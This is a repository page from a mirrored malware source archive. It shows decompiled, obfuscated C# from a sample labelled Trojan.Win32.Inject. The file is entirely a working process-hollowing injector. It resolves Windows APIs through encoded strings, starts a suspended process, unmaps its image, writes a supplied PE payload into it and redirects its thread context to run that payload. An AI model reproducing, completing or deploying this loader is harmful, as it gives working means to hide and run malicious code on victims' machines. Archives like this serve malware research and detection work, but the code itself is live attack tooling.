ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-26 21:35:27 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515/.cs

341 lines
11 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.Runtime.InteropServices;
internal class \uE00A
{
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
private static extern IntPtr \uE000(IntPtr _param0, string _param1);
[DllImport("kernel32", EntryPoint = "GetModuleHandle")]
private static extern IntPtr \uE000(string _param0);
public static void \uE000(byte[] _param0, string _param1, string _param2)
{
\uE00A.\uE017 obj = new \uE00A.\uE017();
ref \uE00A.\uE017 local1 = ref obj;
\uE00A.\uE01B structure1 = new \uE00A.\uE01B();
ref \uE00A.\uE01B local2 = ref structure1;
\uE00A.\uE01E structure2 = new \uE00A.\uE01E();
ref \uE00A.\uE01E local3 = ref structure2;
\uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014();
\uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015();
\uE00A.\uE01D lpContext = new \uE00A.\uE01D();
lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo);
lpContext.\uE000 = 65543U;
GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
gcHandle.Free();
obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017));
structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B));
if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117)
return;
\uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009));
\uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B));
\uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C));
\uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A));
\uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D));
\uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E));
\uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F));
int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0;
int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0;
if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002))
return;
int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0;
for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1)
{
structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E));
byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003];
for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2)
lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2];
int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009);
int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006;
int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001);
}
private delegate bool \uE009(
string lpApplicationName,
string lpCommandLine,
IntPtr lpProcessAttributes,
IntPtr lpThreadAttributes,
bool bInheritHandles,
\uE00A.\uE010 dwCreationFlags,
IntPtr lpEnvironment,
string lpCurrentDirectory,
ref \uE00A.\uE014 lpStartupInfo,
out \uE00A.\uE015 lpProcessInformation);
private delegate bool \uE00A(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
object lpNumberOfBytesWritten);
private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress);
private delegate bool \uE00C(
IntPtr hProcess,
IntPtr lpAddress,
uint dwSize,
\uE00A.\uE013 flAllocationType,
\uE00A.\uE012 flProtect);
private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext);
private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext);
private delegate uint \uE00F(IntPtr hThread);
private enum \uE010 : uint
{
\uE00C = 1,
\uE00B = 2,
\uE009 = 4,
\uE00D = 8,
\uE002 = 16, // 0x00000010
\uE003 = 512, // 0x00000200
\uE00A = 1024, // 0x00000400
\uE007 = 2048, // 0x00000800
\uE008 = 4096, // 0x00001000
\uE00F = 65536, // 0x00010000
\uE005 = 262144, // 0x00040000
\uE00E = 524288, // 0x00080000
\uE000 = 16777216, // 0x01000000
\uE006 = 33554432, // 0x02000000
\uE001 = 67108864, // 0x04000000
\uE004 = 134217728, // 0x08000000
}
private enum \uE011 : uint
{
\uE000 = 65536, // 0x00010000
\uE001 = 65536, // 0x00010000
\uE002 = 65537, // 0x00010001
\uE003 = 65538, // 0x00010002
\uE004 = 65540, // 0x00010004
\uE008 = 65543, // 0x00010007
\uE005 = 65544, // 0x00010008
\uE006 = 65552, // 0x00010010
\uE007 = 65568, // 0x00010020
\uE009 = 65599, // 0x0001003F
}
private enum \uE012 : uint
{
\uE004 = 1,
\uE005 = 2,
\uE006 = 4,
\uE007 = 8,
\uE000 = 16, // 0x00000010
\uE001 = 32, // 0x00000020
\uE002 = 64, // 0x00000040
\uE003 = 128, // 0x00000080
\uE008 = 256, // 0x00000100
\uE009 = 512, // 0x00000200
\uE00A = 1024, // 0x00000400
}
private enum \uE013 : uint
{
\uE000 = 4096, // 0x00001000
\uE001 = 8192, // 0x00002000
\uE002 = 524288, // 0x00080000
\uE005 = 1048576, // 0x00100000
\uE006 = 2097152, // 0x00200000
\uE004 = 4194304, // 0x00400000
\uE003 = 536870912, // 0x20000000
}
private struct \uE014
{
public uint \uE000;
public string \uE001;
public string \uE002;
public string \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public uint \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public short \uE00C;
public short \uE00D;
public IntPtr \uE00E;
public IntPtr \uE00F;
public IntPtr \uE010;
public IntPtr \uE011;
}
private struct \uE015
{
public IntPtr \uE000;
public IntPtr \uE001;
public uint \uE002;
public uint \uE003;
}
private struct \uE016
{
public int \uE000;
public IntPtr \uE001;
public bool \uE002;
}
private struct \uE017
{
public ushort \uE000;
public ushort \uE001;
public ushort \uE002;
public ushort \uE003;
public ushort \uE004;
public ushort \uE005;
public ushort \uE006;
public ushort \uE007;
public ushort \uE008;
public ushort \uE009;
public ushort \uE00A;
public ushort \uE00B;
public ushort \uE00C;
public ushort \uE00D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \uE00E;
public ushort \uE00F;
public ushort \uE010;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \uE011;
public int \uE012;
}
private struct \uE018
{
public ushort \uE000;
public ushort \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public ushort \uE005;
public ushort \uE006;
}
private struct \uE019
{
public uint \uE000;
public uint \uE001;
}
private struct \uE01A
{
public ushort \uE000;
public byte \uE001;
public byte \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public uint \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public ushort \uE00C;
public ushort \uE00D;
public ushort \uE00E;
public ushort \uE00F;
public ushort \uE010;
public ushort \uE011;
public uint \uE012;
public uint \uE013;
public uint \uE014;
public uint \uE015;
public ushort \uE016;
public ushort \uE017;
public uint \uE018;
public uint \uE019;
public uint \uE01A;
public uint \uE01B;
public uint \uE01C;
public uint \uE01D;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \uE00A.\uE019[] \uE01E;
}
private struct \uE01B
{
public uint \uE000;
public \uE00A.\uE018 \uE001;
public \uE00A.\uE01A \uE002;
}
private struct \uE01C
{
public uint \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \uE007;
public uint \uE008;
}
private struct \uE01D
{
public uint \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public \uE00A.\uE01C \uE007;
public uint \uE008;
public uint \uE009;
public uint \uE00A;
public uint \uE00B;
public uint \uE00C;
public uint \uE00D;
public uint \uE00E;
public uint \uE00F;
public uint \uE010;
public uint \uE011;
public uint \uE012;
public uint \uE013;
public uint \uE014;
public uint \uE015;
public uint \uE016;
public uint \uE017;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \uE018;
}
private struct \uE01E
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \uE000;
public uint \uE001;
public uint \uE002;
public uint \uE003;
public uint \uE004;
public uint \uE005;
public uint \uE006;
public ushort \uE007;
public ushort \uE008;
public uint \uE009;
}
}
Reference in New Issue Copy Permalink